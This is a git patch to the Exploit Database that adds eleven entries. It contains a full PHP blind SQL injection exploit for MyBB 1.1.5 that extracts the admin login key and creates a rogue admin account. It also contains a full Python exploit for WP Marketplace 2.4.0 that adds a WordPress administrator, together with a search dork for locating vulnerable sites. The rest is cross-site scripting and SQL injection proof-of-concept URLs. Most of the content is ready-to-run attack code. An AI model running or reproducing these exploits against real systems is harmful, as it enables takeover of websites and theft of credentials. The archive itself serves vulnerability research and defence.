From 3ab5d7365aa7957e46b11d811ac9119a7ff679be Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 26 Mar 2015 08:36:05 +0000 Subject: [PATCH] DB: 2015-03-26 11 new exploits --- files.csv | 13 +- platforms/php/webapps/2012.php | 652 ++++++++++++++--------------- platforms/php/webapps/36481.txt | 9 + platforms/php/webapps/36482.txt | 9 + platforms/php/webapps/36483.txt | 7 + platforms/php/webapps/36484.txt | 7 + platforms/php/webapps/36485.txt | 9 + platforms/php/webapps/36486.txt | 11 + platforms/php/webapps/36487.txt | 7 + platforms/php/webapps/36488.txt | 9 + platforms/php/webapps/36489.txt | 25 ++ platforms/php/webapps/36490.py | 183 ++++++++ platforms/windows/remote/36491.txt | 11 + 13 files changed, 625 insertions(+), 327 deletions(-) create mode 100755 platforms/php/webapps/36481.txt create mode 100755 platforms/php/webapps/36482.txt create mode 100755 platforms/php/webapps/36483.txt create mode 100755 platforms/php/webapps/36484.txt create mode 100755 platforms/php/webapps/36485.txt create mode 100755 platforms/php/webapps/36486.txt create mode 100755 platforms/php/webapps/36487.txt create mode 100755 platforms/php/webapps/36488.txt create mode 100755 platforms/php/webapps/36489.txt create mode 100755 platforms/php/webapps/36490.py create mode 100755 platforms/windows/remote/36491.txt diff --git a/files.csv b/files.csv index 8e000694c..71ece6da2 100755 --- a/files.csv +++ b/files.csv @@ -1717,7 +1717,7 @@ id,file,description,date,author,platform,type,port 2009,platforms/php/webapps/2009.txt,"CzarNews <= 1.14 (tpath) Remote File Inclusion Vulnerability",2006-07-13,SHiKaA,php,webapps,0 2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit",2006-07-14,RusH,php,webapps,0 2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0 -2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0 +2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 - (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0 2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit",2006-07-15,h00lyshit,linux,local,0 2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515 2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0 @@ -32898,3 +32898,14 @@ id,file,description,date,author,platform,type,port 36477,platforms/windows/remote/36477.py,"Bsplayer 2.68 - HTTP Response Exploit (Universal)",2015-03-24,"Fady Mohammed Osman",windows,remote,0 36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Shell Upload Vulnerability",2015-03-24,KedAns-Dz,php,webapps,0 36480,platforms/multiple/remote/36480.rb,"Firefox Proxy Prototype Privileged Javascript Injection",2015-03-24,metasploit,multiple,remote,0 +36481,platforms/php/webapps/36481.txt,"WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross Site Scripting Vulnerability",2011-12-31,6Scan,php,webapps,0 +36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 'err' Parameter Cross Site Scripting Vulnerability",2012-01-01,Net.Edit0r,php,webapps,0 +36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 's' Parameter Cross Site Scripting Vulnerability",2012-01-01,"H4ckCity Security Team",php,webapps,0 +36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 'q' Parameter Cross Site Scripting Vulnerability",2011-01-01,"H4ckCity Security Team",php,webapps,0 +36485,platforms/php/webapps/36485.txt,"FuseTalk Forums 3.2 'windowed' Parameter Cross Site Scripting Vulnerability",2012-01-02,sonyy,php,webapps,0 +36486,platforms/php/webapps/36486.txt,"Tienda Virtual 'art_detalle.php' SQL Injection Vulnerability",2012-01-03,"Arturo Zamora",php,webapps,0 +36487,platforms/php/webapps/36487.txt,"WordPress Comment Rating Plugin 2.9.20 'path' Parameter Cross Site Scripting Vulnerability",2012-01-03,"The Evil Thinker",php,webapps,0 +36488,platforms/php/webapps/36488.txt,"WordPress WHOIS Plugin 1.4.2 3 'domain' Parameter Cross Site Scripting Vulnerability",2012-01-03,Atmon3r,php,webapps,0 +36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 'ddb' Parameter Cross Site Scripting Vulnerability",2012-01-04,"Jonathan Claudius",php,webapps,0 +36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0 +36491,platforms/windows/remote/36491.txt,"Adobe Flash Player Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0 diff --git a/platforms/php/webapps/2012.php b/platforms/php/webapps/2012.php index adf2988f8..d36e53083 100755 --- a/platforms/php/webapps/2012.php +++ b/platforms/php/webapps/2012.php @@ -1,326 +1,326 @@ -#!/usr/bin/php -q -d short_open_tag=on -ipaddress = $ipaddress = getip(); - - // - // User-agent - // - $this->useragent = $_SERVER['HTTP_USER_AGENT']; - if(strlen($this->useragent) > 100) - { - $this->useragent = substr($this->useragent, 0, 100); - } - - // - // Attempt to find a session id in the cookies - // - if($_COOKIE['sid']) - { - $this->sid = addslashes($_COOKIE['sid']); - } - else - { - $this->sid = 0; - } - - // - // Attempt to load the session from the database - // - $query = $db->query("SELECT sid,uid FROM ".TABLE_PREFIX."sessions WHERE sid='".$this->sid."' AND ip='".$this->ipaddress."'"); -... - -injection is blind, but you can ask true-false questions to the database to -retrieve the admin loginkey. -Through that you can build an admin cookie and create a new admin user through -the admin/users.php script. -Also you can disclose table prefix. - --------------------------------------------------------------------------------- - - --*****************************************************************************- -* * -* Italia - Germania 2-0, al 114' forse il pił bel gol che abbia mai visto * -* grazie Grosso! * -* * --*****************************************************************************- - */ - -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -function make_seed() -{ - list($usec, $sec) = explode(' ', microtime()); - return (float) $sec + ((float) $usec * 100000); -} -srand(make_seed()); -$anumber = rand(1,99999); - -$host=$argv[1]; -$path=$argv[2]; -$port=80; -$prefix="mybb_"; -$user_id="1";//admin -$proxy=""; -$dt=0; -for ($i=3; $i<$argc; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -if ($temp=="-T") -{ - $prefix=str_replace("-T","",$argv[$i]); -} -if ($temp=="-u") -{ - $user_id=str_replace("-u","",$argv[$i]); -} -if ($temp=="-d") -{ - $dt=1; -} -} -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -if ($dt) -{ -$sql="'suntzuuuu/*"; -echo "sql -> ".$sql."\r\n"; -$packet ="GET ".$p."index.php HTTP/1.0\r\n"; -$packet.="CLIENT-IP: $sql\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -if (eregi("You have an error in your SQL syntax",$html)) -{ - $temp=explode("sessions",$html); - $temp2=explode(" ",$temp[0]); - $prefix=$temp2[count($temp2)-1]; - echo "prefix -> ".$prefix;if ($prefix==""){echo "[no prefix]";}echo"\n"; -} -else -{ -echo "unable to disclose table prefix...\n"; -} -sleep(1); -} - -$chars[0]=0;//null -$chars=array_merge($chars,range(48,57)); //numbers -$chars=array_merge($chars,range(65,90));//A-Z letters -$chars=array_merge($chars,range(97,122));//a-f letters -$j=1; -$loginkey=""; -while (!strstr($loginkey,chr(0))) -{ -for ($i=0; $i<=255; $i++) -{ -if (in_array($i,$chars)) -{ -$sql="99999999' UNION SELECT ASCII(SUBSTRING(loginkey,".$j.",1))=".$i.",0 FROM ".$prefix."users WHERE uid=1/*"; -echo "sql -> ".$sql."\r\n"; -$packet ="GET ".$p."index.php HTTP/1.0\r\n"; -$packet.="CLIENT-IP: $sql\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -if (eregi("Hello There",$html)) {$loginkey.=chr($i);echo "loginkey -> ".$loginkey."[???]\r\n";sleep(1);break;} -} -if ($i==255) {die("Exploit failed...");} -} - $j++; -} -$cookie="mybbuser=1_".trim(str_replace(chr(0),"",$loginkey))."; mybbadmin=1_".trim(str_replace(chr(0),"",$loginkey)).";"; -echo "admin cookie -> ".$cookie."\r\n"; - - -$data='-----------------------------7d62702f250530 -Content-Disposition: form-data; name="action"; - -do_add ------------------------------7d62702f250530 -Content-Disposition: form-data; name="userusername"; - -suntzu'.$anumber.' ------------------------------7d62702f250530 -Content-Disposition: form-data; name="newpassword"; - -suntzu'.$anumber.' ------------------------------7d62702f250530 -Content-Disposition: form-data; name="email"; - -suntzoi@suntzu.org ------------------------------7d62702f250530 -Content-Disposition: form-data; name="usergroup"; - -4 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="additionalgroups[]"; - -4 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="displaygroup"; - -4 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="Add User"; - - Add User ------------------------------7d62702f250530-- -'; - -$packet="POST ".$p."admin/users.php HTTP/1.0\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Cookie: ".$cookie."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -if (eregi("The user has successfully been added",$html)) -{ - echo "exploit succeeded... now login as admin\n"; - echo "with username \"suntzu".$anumber."\" and password \"suntzu".$anumber."\"\n"; -} -else -{ - echo "something goes wrong...\n";if(!$dt)echo "you may try -d option\n"; -} -?> - -# milw0rm.com [2006-07-15] +#!/usr/bin/php -q -d short_open_tag=on +ipaddress = $ipaddress = getip(); + + // + // User-agent + // + $this->useragent = $_SERVER['HTTP_USER_AGENT']; + if(strlen($this->useragent) > 100) + { + $this->useragent = substr($this->useragent, 0, 100); + } + + // + // Attempt to find a session id in the cookies + // + if($_COOKIE['sid']) + { + $this->sid = addslashes($_COOKIE['sid']); + } + else + { + $this->sid = 0; + } + + // + // Attempt to load the session from the database + // + $query = $db->query("SELECT sid,uid FROM ".TABLE_PREFIX."sessions WHERE sid='".$this->sid."' AND ip='".$this->ipaddress."'"); +... + +injection is blind, but you can ask true-false questions to the database to +retrieve the admin loginkey. +Through that you can build an admin cookie and create a new admin user through +the admin/users.php script. +Also you can disclose table prefix. + +-------------------------------------------------------------------------------- + + +-*****************************************************************************- +* * +* Italia - Germania 2-0, al 114' forse il pił bel gol che abbia mai visto * +* grazie Grosso! * +* * +-*****************************************************************************- + */ + +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +function make_seed() +{ + list($usec, $sec) = explode(' ', microtime()); + return (float) $sec + ((float) $usec * 100000); +} +srand(make_seed()); +$anumber = rand(1,99999); + +$host=$argv[1]; +$path=$argv[2]; +$port=80; +$prefix="mybb_"; +$user_id="1";//admin +$proxy=""; +$dt=0; +for ($i=3; $i<$argc; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +if ($temp=="-T") +{ + $prefix=str_replace("-T","",$argv[$i]); +} +if ($temp=="-u") +{ + $user_id=str_replace("-u","",$argv[$i]); +} +if ($temp=="-d") +{ + $dt=1; +} +} +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +if ($dt) +{ +$sql="'suntzuuuu/*"; +echo "sql -> ".$sql."\r\n"; +$packet ="GET ".$p."index.php HTTP/1.0\r\n"; +$packet.="CLIENT-IP: $sql\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet); +if (eregi("You have an error in your SQL syntax",$html)) +{ + $temp=explode("sessions",$html); + $temp2=explode(" ",$temp[0]); + $prefix=$temp2[count($temp2)-1]; + echo "prefix -> ".$prefix;if ($prefix==""){echo "[no prefix]";}echo"\n"; +} +else +{ +echo "unable to disclose table prefix...\n"; +} +sleep(1); +} + +$chars[0]=0;//null +$chars=array_merge($chars,range(48,57)); //numbers +$chars=array_merge($chars,range(65,90));//A-Z letters +$chars=array_merge($chars,range(97,122));//a-f letters +$j=1; +$loginkey=""; +while (!strstr($loginkey,chr(0))) +{ +for ($i=0; $i<=255; $i++) +{ +if (in_array($i,$chars)) +{ +$sql="99999999' UNION SELECT ASCII(SUBSTRING(loginkey,".$j.",1))=".$i.",0 FROM ".$prefix."users WHERE uid=1/*"; +echo "sql -> ".$sql."\r\n"; +$packet ="GET ".$p."index.php HTTP/1.0\r\n"; +$packet.="CLIENT-IP: $sql\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet); +if (eregi("Hello There",$html)) {$loginkey.=chr($i);echo "loginkey -> ".$loginkey."[???]\r\n";sleep(1);break;} +} +if ($i==255) {die("Exploit failed...");} +} + $j++; +} +$cookie="mybbuser=1_".trim(str_replace(chr(0),"",$loginkey))."; mybbadmin=1_".trim(str_replace(chr(0),"",$loginkey)).";"; +echo "admin cookie -> ".$cookie."\r\n"; + + +$data='-----------------------------7d62702f250530 +Content-Disposition: form-data; name="action"; + +do_add +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="userusername"; + +suntzu'.$anumber.' +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="newpassword"; + +suntzu'.$anumber.' +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="email"; + +suntzoi@suntzu.org +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="usergroup"; + +4 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="additionalgroups[]"; + +4 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="displaygroup"; + +4 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="Add User"; + + Add User +-----------------------------7d62702f250530-- +'; + +$packet="POST ".$p."admin/users.php HTTP/1.0\r\n"; +$packet.="User-Agent: Googlebot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Cookie: ".$cookie."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +if (eregi("The user has successfully been added",$html)) +{ + echo "exploit succeeded... now login as admin\n"; + echo "with username \"suntzu".$anumber."\" and password \"suntzu".$anumber."\"\n"; +} +else +{ + echo "something goes wrong...\n";if(!$dt)echo "you may try -d option\n"; +} +?> + +# milw0rm.com [2006-07-15] diff --git a/platforms/php/webapps/36481.txt b/platforms/php/webapps/36481.txt new file mode 100755 index 000000000..123807b6e --- /dev/null +++ b/platforms/php/webapps/36481.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51216/info + +The TheCartPress WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +TheCartPress WordPress Plugin 1.6 and prior versions are vulnerable. + +http://www.example.com/wp-content/plugins/thecartpress/admin/OptionsPostsList.php?tcp_options_posts_update=sdf&tcp_name_post_234=%3Cimg%20src=[XSS]&tcp_post_ids[]=234 \ No newline at end of file diff --git a/platforms/php/webapps/36482.txt b/platforms/php/webapps/36482.txt new file mode 100755 index 000000000..b950f4f4a --- /dev/null +++ b/platforms/php/webapps/36482.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51218/info + +Siena CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Siena CMS 1.242 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?err=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36483.txt b/platforms/php/webapps/36483.txt new file mode 100755 index 000000000..0f371128b --- /dev/null +++ b/platforms/php/webapps/36483.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/51220/info + +WP Live.php plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/[path]/wp-content/plugins/wp-livephp/wp-live.php?s=[Xss] \ No newline at end of file diff --git a/platforms/php/webapps/36484.txt b/platforms/php/webapps/36484.txt new file mode 100755 index 000000000..3fe15e601 --- /dev/null +++ b/platforms/php/webapps/36484.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/51221/info + +PHPB2B is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/[patch]/list.php?do=search&q=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36485.txt b/platforms/php/webapps/36485.txt new file mode 100755 index 000000000..44fa44dcc --- /dev/null +++ b/platforms/php/webapps/36485.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51227/info + +FuseTalk Forums is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker could leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +FuseTalk Forums 3.2 is vulnerable; other versions may also be affected. + +http://www.example.com/login.cfm?windowed=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E \ No newline at end of file diff --git a/platforms/php/webapps/36486.txt b/platforms/php/webapps/36486.txt new file mode 100755 index 000000000..2ea17ec4e --- /dev/null +++ b/platforms/php/webapps/36486.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/51240/info + +Tienda Virtual is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +The following example URIs are available: + +http://www.example.com/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13-- + +http://www.example.com/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables-- \ No newline at end of file diff --git a/platforms/php/webapps/36487.txt b/platforms/php/webapps/36487.txt new file mode 100755 index 000000000..479b45307 --- /dev/null +++ b/platforms/php/webapps/36487.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/51241/info + +The Comment Rating plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker could leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=&imgIndex= \ No newline at end of file diff --git a/platforms/php/webapps/36488.txt b/platforms/php/webapps/36488.txt new file mode 100755 index 000000000..50e6e196b --- /dev/null +++ b/platforms/php/webapps/36488.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51244/info + +WHOIS for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +WHOIS 1.4.2.3 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/wp-content/plugins/wp-whois/wp-whois-ajax.php?cmd=wpwhoisform&ms=Xss?domain=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36489.txt b/platforms/php/webapps/36489.txt new file mode 100755 index 000000000..c89571b4c --- /dev/null +++ b/platforms/php/webapps/36489.txt @@ -0,0 +1,25 @@ +source: http://www.securityfocus.com/bid/51254/info + +TextPattern is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +TextPattern 4.4.1 is vulnerable; other versions may also be affected. + +POST /textpattern/setup/index.php HTTP/1.1 + +Host: A.B.C.D +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) +Gecko/20100101 Firefox/8.0.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-us,en;q=0.5 +Accept-Encoding: gzip, deflate +Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 +Proxy-Connection: keep-alive +Referer: http://www.example.com/textpattern/setup/index.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 156 + +duser=blah&dpass=&dhost=localhost&ddb=%3Cscript%3Ealert%28%27123%27%29%3C%2 +Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=print +Config \ No newline at end of file diff --git a/platforms/php/webapps/36490.py b/platforms/php/webapps/36490.py new file mode 100755 index 000000000..8c5ace501 --- /dev/null +++ b/platforms/php/webapps/36490.py @@ -0,0 +1,183 @@ +#!/usr/bin/python +# +# Exploit Name: WP Marketplace 2.4.0 Remote Command Execution +# +# Vulnerability discovered by Kacper Szurek (http://security.szurek.pl) +# +# Exploit written by Claudio Viviani +# +# +# +# -------------------------------------------------------------------- +# +# The vulnerable function is located on "wpmarketplace/libs/cart.php" file: +# +# function ajaxinit(){ +# if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){ +# if(function_exists($_POST['execute'])) +# call_user_func($_POST['execute'],$_POST); +# else +# echo __("function not defined!","wpmarketplace"); +# die(); +# } +#} +# +# Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook). +# wpmp_pp_ajax_call() call functions by call_user_func() through POST data: +# +# if (function_exists($_POST['execute'])) +# call_user_func($_POST['execute'], $_POST); +# else +# ... +# ... +# ... +# +# $_POST data needs to be an array +# +# +# The wordpress function wp_insert_user is perfect: +# +# http://codex.wordpress.org/Function_Reference/wp_insert_user +# +# Description +# +# Insert a user into the database. +# +# Usage +# +# +# +# Parameters +# +# $userdata +# (mixed) (required) An array of user data, stdClass or WP_User object. +# Default: None +# +# +# +# Evil POST Data (Add new Wordpress Administrator): +# +# action=wpmp_pp_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator +# +# --------------------------------------------------------------------- +# +# Dork google: index of "wpmarketplace" +# +# Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6 +# +# Http connection +import urllib, urllib2, socket +# +import sys +# String manipulator +import string, random +# Args management +import optparse + +# Check url +def checkurl(url): + if url[:8] != "https://" and url[:7] != "http://": + print('[X] You must insert http:// or https:// procotol') + sys.exit(1) + else: + return url + +# Check if file exists and has readable +def checkfile(file): + if not os.path.isfile(file) and not os.access(file, os.R_OK): + print '[X] '+file+' file is missing or not readable' + sys.exit(1) + else: + return file + +def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits): + return ''.join(random.choice(chars) for _ in range(size)) + +banner = """ + ___ ___ __ + | Y .-----.----.--| .-----.----.-----.-----.-----. + |. | | _ | _| _ | _ | _| -__|__ --|__ --| + |. / \ |_____|__| |_____| __|__| |_____|_____|_____| + |: | |__| + |::.|:. | + `--- ---' + ___ ___ __ __ __ + | Y .---.-.----| |--.-----| |_.-----| .---.-.----.-----. + |. | _ | _| <| -__| _| _ | | _ | __| -__| + |. \_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____| + |: | | |__| + |::.|:. | + `--- ---' + WP Marketplace + R3m0t3 C0d3 Ex3cut10n + (Add WP Admin) + v2.4.0 + + Written by: + + Claudio Viviani + + http://www.homelab.it + + info@homelab.it + homelabit@protonmail.ch + + https://www.facebook.com/homelabit + https://twitter.com/homelabit + https://plus.google.com/+HomelabIt1/ + https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww +""" + +commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]') +commandList.add_option('-t', '--target', action="store", + help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", + ) +commandList.add_option('--timeout', action="store", default=10, type="int", + help="[Timeout Value] - Default 10", + ) + +options, remainder = commandList.parse_args() + +# Check args +if not options.target: + print(banner) + commandList.print_help() + sys.exit(1) + +host = checkurl(options.target) +timeout = options.timeout + +print(banner) + +socket.setdefaulttimeout(timeout) + +username = id_generator() +pwd = id_generator() + +body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call', + 'execute' : 'wp_insert_user', + 'user_login' : username, + 'user_pass' : pwd, + 'role' : 'administrator'}) + +headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'} + +print "[+] Tryng to connect to: "+host +try: + req = urllib2.Request(host+"/", body, headers) + response = urllib2.urlopen(req) + html = response.read() + + if html == "": + print("[!] Account Added") + print("[!] Location: "+host+"/wp-login.php") + print("[!] Username: "+username) + print("[!] Password: "+pwd) + else: + print("[X] Exploitation Failed :(") + +except urllib2.HTTPError as e: + print("[X] "+str(e)) +except urllib2.URLError as e: + print("[X] Connection Error: "+str(e)) + diff --git a/platforms/windows/remote/36491.txt b/platforms/windows/remote/36491.txt new file mode 100755 index 000000000..7075c5654 --- /dev/null +++ b/platforms/windows/remote/36491.txt @@ -0,0 +1,11 @@ 